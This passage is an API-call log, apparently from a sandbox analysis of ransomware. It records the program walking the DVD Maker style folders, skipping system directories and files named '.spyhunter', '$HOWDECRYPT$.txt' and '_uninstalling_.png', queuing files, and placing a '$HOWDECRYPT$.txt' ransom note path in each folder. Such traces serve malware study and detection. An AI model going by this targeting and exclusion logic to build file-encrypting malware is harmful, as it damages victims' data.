[0092.457] lstrcmpiW (lpString1="DvdTransform.fx", lpString2="Windows") returned -1 [0092.457] lstrlenW (lpString="Windows") returned 7 [0092.457] lstrcmpiW (lpString1="DvdTransform.fx", lpString2="$Recycle.bin") returned 1 [0092.457] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.457] lstrcmpiW (lpString1="DvdTransform.fx", lpString2="System Volume Information") returned -1 [0092.458] lstrlenW (lpString="System Volume Information") returned 25 [0092.458] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\DvdTransform.fx") returned 63 [0092.458] StrStrIW (lpFirst="DvdTransform.fx", lpSrch=".spyhunter") returned 0x0 [0092.458] lstrcmpW (lpString1="DvdTransform.fx", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.458] lstrcmpW (lpString1="DvdTransform.fx", lpString2="_uninstalling_.png") returned 1 [0092.458] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\DvdTransform.fx") returned 63 [0092.458] GetProcessHeap () returned 0x2c0000 [0092.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc0) returned 0x32d8d8 [0092.458] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1678) returned 0x2c310e0 [0092.458] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.458] lstrcmpiW (lpString1="FlipPage", lpString2="Windows") returned -1 [0092.458] lstrlenW (lpString="Windows") returned 7 [0092.458] lstrcmpiW (lpString1="FlipPage", lpString2="$Recycle.bin") returned 1 [0092.458] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.458] lstrcmpiW (lpString1="FlipPage", lpString2="System Volume Information") returned -1 [0092.458] lstrlenW (lpString="System Volume Information") returned 25 [0092.458] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage") returned 56 [0092.458] lstrcmpW (lpString1="FlipPage", lpString2=".") returned 1 [0092.458] lstrcmpW (lpString1="FlipPage", lpString2="..") returned 1 [0092.458] GetProcessHeap () returned 0x2c0000 [0092.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c21098 [0092.459] wnsprintfW (in: pszDest=0x2c21098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\*") returned 58 [0092.459] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0092.501] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.501] lstrlenW (lpString="Windows") returned 7 [0092.501] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.501] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.501] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.501] lstrlenW (lpString="System Volume Information") returned 25 [0092.501] wnsprintfW (in: pszDest=0x2c21098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\.") returned 58 [0092.501] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.501] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.501] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.501] lstrlenW (lpString="Windows") returned 7 [0092.501] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.502] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.502] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.502] lstrlenW (lpString="System Volume Information") returned 25 [0092.502] wnsprintfW (in: pszDest=0x2c21098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\..") returned 59 [0092.502] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.502] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.502] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.502] lstrcmpiW (lpString1="1047x576black.png", lpString2="Windows") returned -1 [0092.502] lstrlenW (lpString="Windows") returned 7 [0092.502] lstrcmpiW (lpString1="1047x576black.png", lpString2="$Recycle.bin") returned 1 [0092.502] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.502] lstrcmpiW (lpString1="1047x576black.png", lpString2="System Volume Information") returned -1 [0092.502] lstrlenW (lpString="System Volume Information") returned 25 [0092.502] wnsprintfW (in: pszDest=0x2c21098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\1047x576black.png") returned 74 [0092.502] StrStrIW (lpFirst="1047x576black.png", lpSrch=".spyhunter") returned 0x0 [0092.502] lstrcmpW (lpString1="1047x576black.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.502] lstrcmpW (lpString1="1047x576black.png", lpString2="_uninstalling_.png") returned 1 [0092.502] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\1047x576black.png") returned 74 [0092.502] GetProcessHeap () returned 0x2c0000 [0092.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd6) returned 0x346c68 [0092.502] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1538) returned 0x2c310e0 [0092.502] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.502] lstrcmpiW (lpString1="203x8subpicture.png", lpString2="Windows") returned -1 [0092.502] lstrlenW (lpString="Windows") returned 7 [0092.502] lstrcmpiW (lpString1="203x8subpicture.png", lpString2="$Recycle.bin") returned 1 [0092.503] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.503] lstrcmpiW (lpString1="203x8subpicture.png", lpString2="System Volume Information") returned -1 [0092.503] lstrlenW (lpString="System Volume Information") returned 25 [0092.503] wnsprintfW (in: pszDest=0x2c21098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\203x8subpicture.png") returned 76 [0092.503] StrStrIW (lpFirst="203x8subpicture.png", lpSrch=".spyhunter") returned 0x0 [0092.503] lstrcmpW (lpString1="203x8subpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.503] lstrcmpW (lpString1="203x8subpicture.png", lpString2="_uninstalling_.png") returned 1 [0092.503] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\203x8subpicture.png") returned 76 [0092.503] GetProcessHeap () returned 0x2c0000 [0092.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x3780d8 [0092.503] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1540) returned 0x2c310e0 [0092.503] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.503] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="Windows") returned -1 [0092.503] lstrlenW (lpString="Windows") returned 7 [0092.503] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0092.503] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.503] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0092.503] lstrlenW (lpString="System Volume Information") returned 25 [0092.503] wnsprintfW (in: pszDest=0x2c21098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_ButtonGraphic.png") returned 89 [0092.503] StrStrIW (lpFirst="NavigationLeft_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0092.503] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.503] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0092.503] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_ButtonGraphic.png") returned 89 [0092.503] GetProcessHeap () returned 0x2c0000 [0092.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf4) returned 0x35a160 [0092.504] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1548) returned 0x2c310e0 [0092.504] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.504] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="Windows") returned -1 [0092.504] lstrlenW (lpString="Windows") returned 7 [0092.504] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0092.504] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.504] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0092.504] lstrlenW (lpString="System Volume Information") returned 25 [0092.504] wnsprintfW (in: pszDest=0x2c21098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_SelectionSubpicture.png") returned 95 [0092.504] StrStrIW (lpFirst="NavigationLeft_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0092.504] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.504] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0092.504] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_SelectionSubpicture.png") returned 95 [0092.504] GetProcessHeap () returned 0x2c0000 [0092.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x100) returned 0x381880 [0092.504] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1550) returned 0x2c310e0 [0092.504] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.504] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="Windows") returned -1 [0092.504] lstrlenW (lpString="Windows") returned 7 [0092.504] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0092.504] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.504] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0092.504] lstrlenW (lpString="System Volume Information") returned 25 [0092.504] wnsprintfW (in: pszDest=0x2c21098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_ButtonGraphic.png") returned 90 [0092.505] StrStrIW (lpFirst="NavigationRight_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0092.505] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.505] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0092.505] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_ButtonGraphic.png") returned 90 [0092.505] GetProcessHeap () returned 0x2c0000 [0092.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf6) returned 0x35a260 [0092.505] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1558) returned 0x2c310e0 [0092.505] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.505] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="Windows") returned -1 [0092.505] lstrlenW (lpString="Windows") returned 7 [0092.505] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0092.505] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.505] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0092.505] lstrlenW (lpString="System Volume Information") returned 25 [0092.505] wnsprintfW (in: pszDest=0x2c21098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_SelectionSubpicture.png") returned 96 [0092.505] StrStrIW (lpFirst="NavigationRight_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0092.505] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.505] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0092.505] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_SelectionSubpicture.png") returned 96 [0092.505] GetProcessHeap () returned 0x2c0000 [0092.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x102) returned 0x37a750 [0092.505] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1560) returned 0x2c310e0 [0092.505] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.505] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="Windows") returned -1 [0092.506] lstrlenW (lpString="Windows") returned 7 [0092.506] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0092.506] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.506] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0092.506] lstrlenW (lpString="System Volume Information") returned 25 [0092.506] wnsprintfW (in: pszDest=0x2c21098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_ButtonGraphic.png") returned 87 [0092.506] StrStrIW (lpFirst="NavigationUp_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0092.506] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.506] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0092.506] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_ButtonGraphic.png") returned 87 [0092.506] GetProcessHeap () returned 0x2c0000 [0092.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf0) returned 0x3555a0 [0092.506] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1568) returned 0x2c310e0 [0092.506] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.506] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="Windows") returned -1 [0092.506] lstrlenW (lpString="Windows") returned 7 [0092.506] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0092.506] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.506] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0092.506] lstrlenW (lpString="System Volume Information") returned 25 [0092.506] wnsprintfW (in: pszDest=0x2c21098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_SelectionSubpicture.png") returned 93 [0092.506] StrStrIW (lpFirst="NavigationUp_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0092.506] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.506] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0092.506] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_SelectionSubpicture.png") returned 93 [0092.507] GetProcessHeap () returned 0x2c0000 [0092.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xfc) returned 0x381988 [0092.507] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1570) returned 0x2c310e0 [0092.507] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.507] lstrcmpiW (lpString1="pagecurl.png", lpString2="Windows") returned -1 [0092.507] lstrlenW (lpString="Windows") returned 7 [0092.507] lstrcmpiW (lpString1="pagecurl.png", lpString2="$Recycle.bin") returned 1 [0092.507] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.507] lstrcmpiW (lpString1="pagecurl.png", lpString2="System Volume Information") returned -1 [0092.507] lstrlenW (lpString="System Volume Information") returned 25 [0092.507] wnsprintfW (in: pszDest=0x2c21098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\pagecurl.png") returned 69 [0092.507] StrStrIW (lpFirst="pagecurl.png", lpSrch=".spyhunter") returned 0x0 [0092.507] lstrcmpW (lpString1="pagecurl.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.507] lstrcmpW (lpString1="pagecurl.png", lpString2="_uninstalling_.png") returned 1 [0092.507] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\pagecurl.png") returned 69 [0092.507] GetProcessHeap () returned 0x2c0000 [0092.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x37e3b0 [0092.507] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1578) returned 0x2c310e0 [0092.507] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0092.507] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0092.508] wnsprintfW (in: pszDest=0x2c21098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\$HOWDECRYPT$.txt") returned 73 [0092.508] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\$HOWDECRYPT$.txt") returned 73 [0092.508] GetProcessHeap () returned 0x2c0000 [0092.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd4) returned 0x346728 [0092.508] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1580) returned 0x2c310e0 [0092.508] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.509] lstrcmpiW (lpString1="Full", lpString2="Windows") returned -1 [0092.509] lstrlenW (lpString="Windows") returned 7 [0092.509] lstrcmpiW (lpString1="Full", lpString2="$Recycle.bin") returned 1 [0092.509] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.509] lstrcmpiW (lpString1="Full", lpString2="System Volume Information") returned -1 [0092.509] lstrlenW (lpString="System Volume Information") returned 25 [0092.509] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full") returned 52 [0092.509] lstrcmpW (lpString1="Full", lpString2=".") returned 1 [0092.509] lstrcmpW (lpString1="Full", lpString2="..") returned 1 [0092.509] GetProcessHeap () returned 0x2c0000 [0092.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c13898 [0092.509] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\*") returned 54 [0092.509] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0092.530] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.530] lstrlenW (lpString="Windows") returned 7 [0092.530] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.530] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.530] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.530] lstrlenW (lpString="System Volume Information") returned 25 [0092.530] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\.") returned 54 [0092.530] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.530] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.530] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.530] lstrlenW (lpString="Windows") returned 7 [0092.530] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.530] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.530] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.530] lstrlenW (lpString="System Volume Information") returned 25 [0092.530] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\..") returned 55 [0092.530] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.530] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.530] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.530] lstrcmpiW (lpString1="1047x576black.png", lpString2="Windows") returned -1 [0092.530] lstrlenW (lpString="Windows") returned 7 [0092.530] lstrcmpiW (lpString1="1047x576black.png", lpString2="$Recycle.bin") returned 1 [0092.530] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.531] lstrcmpiW (lpString1="1047x576black.png", lpString2="System Volume Information") returned -1 [0092.531] lstrlenW (lpString="System Volume Information") returned 25 [0092.531] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\1047x576black.png") returned 70 [0092.531] StrStrIW (lpFirst="1047x576black.png", lpSrch=".spyhunter") returned 0x0 [0092.531] lstrcmpW (lpString1="1047x576black.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.531] lstrcmpW (lpString1="1047x576black.png", lpString2="_uninstalling_.png") returned 1 [0092.531] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\1047x576black.png") returned 70 [0092.531] GetProcessHeap () returned 0x2c0000 [0092.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x37e3b0 [0092.531] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1528) returned 0x2c310e0 [0092.531] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.531] lstrcmpiW (lpString1="15x15dot.png", lpString2="Windows") returned -1 [0092.531] lstrlenW (lpString="Windows") returned 7 [0092.531] lstrcmpiW (lpString1="15x15dot.png", lpString2="$Recycle.bin") returned 1 [0092.531] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.531] lstrcmpiW (lpString1="15x15dot.png", lpString2="System Volume Information") returned -1 [0092.531] lstrlenW (lpString="System Volume Information") returned 25 [0092.531] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\15x15dot.png") returned 65 [0092.531] StrStrIW (lpFirst="15x15dot.png", lpSrch=".spyhunter") returned 0x0 [0092.531] lstrcmpW (lpString1="15x15dot.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.531] lstrcmpW (lpString1="15x15dot.png", lpString2="_uninstalling_.png") returned 1 [0092.531] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\15x15dot.png") returned 65 [0092.531] GetProcessHeap () returned 0x2c0000 [0092.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x358d60 [0092.532] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1530) returned 0x2c310e0 [0092.532] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.532] lstrcmpiW (lpString1="dotsdarkoverlay.png", lpString2="Windows") returned -1 [0092.532] lstrlenW (lpString="Windows") returned 7 [0092.532] lstrcmpiW (lpString1="dotsdarkoverlay.png", lpString2="$Recycle.bin") returned 1 [0092.532] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.532] lstrcmpiW (lpString1="dotsdarkoverlay.png", lpString2="System Volume Information") returned -1 [0092.532] lstrlenW (lpString="System Volume Information") returned 25 [0092.532] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotsdarkoverlay.png") returned 72 [0092.532] StrStrIW (lpFirst="dotsdarkoverlay.png", lpSrch=".spyhunter") returned 0x0 [0092.533] lstrcmpW (lpString1="dotsdarkoverlay.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.533] lstrcmpW (lpString1="dotsdarkoverlay.png", lpString2="_uninstalling_.png") returned 1 [0092.533] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotsdarkoverlay.png") returned 72 [0092.533] GetProcessHeap () returned 0x2c0000 [0092.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x346728 [0092.533] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1538) returned 0x2c310e0 [0092.533] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.533] lstrcmpiW (lpString1="dotslightoverlay.png", lpString2="Windows") returned -1 [0092.533] lstrlenW (lpString="Windows") returned 7 [0092.533] lstrcmpiW (lpString1="dotslightoverlay.png", lpString2="$Recycle.bin") returned 1 [0092.533] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.533] lstrcmpiW (lpString1="dotslightoverlay.png", lpString2="System Volume Information") returned -1 [0092.533] lstrlenW (lpString="System Volume Information") returned 25 [0092.533] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotslightoverlay.png") returned 73 [0092.533] StrStrIW (lpFirst="dotslightoverlay.png", lpSrch=".spyhunter") returned 0x0 [0092.533] lstrcmpW (lpString1="dotslightoverlay.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.533] lstrcmpW (lpString1="dotslightoverlay.png", lpString2="_uninstalling_.png") returned 1 [0092.533] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotslightoverlay.png") returned 73 [0092.533] GetProcessHeap () returned 0x2c0000 [0092.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd4) returned 0x346d48 [0092.533] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1540) returned 0x2c310e0 [0092.533] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.533] lstrcmpiW (lpString1="full.png", lpString2="Windows") returned -1 [0092.534] lstrlenW 